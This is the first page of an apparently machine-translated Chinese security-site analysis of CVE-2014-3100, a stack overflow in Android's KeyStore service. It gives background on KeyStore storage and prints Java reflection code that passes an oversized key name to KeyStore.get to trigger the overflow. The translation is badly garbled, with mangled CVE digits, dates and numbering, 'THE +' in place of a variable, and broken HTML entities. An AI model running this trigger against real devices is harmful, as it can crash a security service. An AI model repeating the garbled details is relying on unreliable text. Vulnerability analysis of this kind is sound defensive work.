[CVE-2 0 1 4-3 1 0 0]Android KeyStore stack overflow vulnerability analysis-vulnerability warning-the black bar safety net

2014-11-13T00:00:00
ID MYHACK58:62201455779
Type myhack58
Reporter 佚名
Modified 2014-11-13T00:00:00

Description

CVE-2 0 1 4-3 1 0 0 is Android platform KeyStore to a stack overflow vulnerability. This vulnerability is the last 9 month by IBM of the two engineers found and reported to Google, in year 6, on 2 3, is disclosed. After the public, Google also released a vulnerability test code. So what is a KeyStore?

Android provides a/system/bin/keystore implementations of the secure storage service. Once this service is available through other software using the unix socket to find. 4.3 later versions are using the Binder interface to access, the 4.3 previous version to Locol Socket received in the form of the user for service access.

Each Android user has his own secure storage to take more than. Blobs is through a master key, using AES algorithm for encryption of storage. And the MasterKey is by PKCS5_PBKDF2_HMAC_SHA1 the generated password is encrypted and stored on the hard disk.

In recent Android versions, like RSA private key like a password can already start to do hardware-based. This means that the stored key is just used to do hardware-based true key identification. In addition to the hardware support, similar to the VPN PPTP like a password or by encryption of the stored on the hard disk

Let's analyze the problem.

android. security. The KeyStore class in the get method allows to pass in a named keyName of type String, the client can pass in a long string.

  1. Class<?& gt; keystoreClass = Class. forName("android. security. KeyStore");

  2. Method getInstance = keystoreClass. getMethod("getInstance");

  3. Method get = keystoreClass. getMethod("get", String.class);

  4. Object keystore = getInstance. invoke(null);

  5. String keyName = "SSSS SSSS SSSS SSSS"

1 0. THE + "SSSS SSSS SSSS SSSS"

1 1. THE + "SSSS SSSS SSSS SSSS"

1 2. THE + "SSSS SSSS SSSS SSSS"

1 3. THE + "SSSS SSSS SSSS SSSS"

1 4. THE + "SSSS SSSS SSSS SSSS"

1 5. THE + "SSSS SSSS SSSS SSSS"

1 6. THE + "SSSS SSSS SSSS SSSS"

1 7. THE + "SSSS SSSS SSSS SSSS"

1 8. THE + "SSSS SSSS SSSS SSSS"

1 9. THE + "SSSS SSSS SSSS SSSS"

2 0. THE + "SSSS SSSS SSSS SSSS"

2 1. THE + "SSSS SSSS SSSS SSSS"

2 2. THE + "SSSS SSSS SSSS SSSS"

2 3. THE + "SSSS SSSS SSSS SSSS"

2 4. THE + "SSSS SSSS SSSS SSSS"

2 5. THE + "SSSS SSSS SSSS SSSS"

2 6. THE + "SSSS SSSS SSSS SSSS"

2 7. THE + "SSSS SSSS SSSS SSSS"

2 8. THE + "SSSS SSSS SSSS SSSS";

2 9. get. invoke(keystore, keyName);

[1] [2] [3] [4] [5] [6] [7] [8] next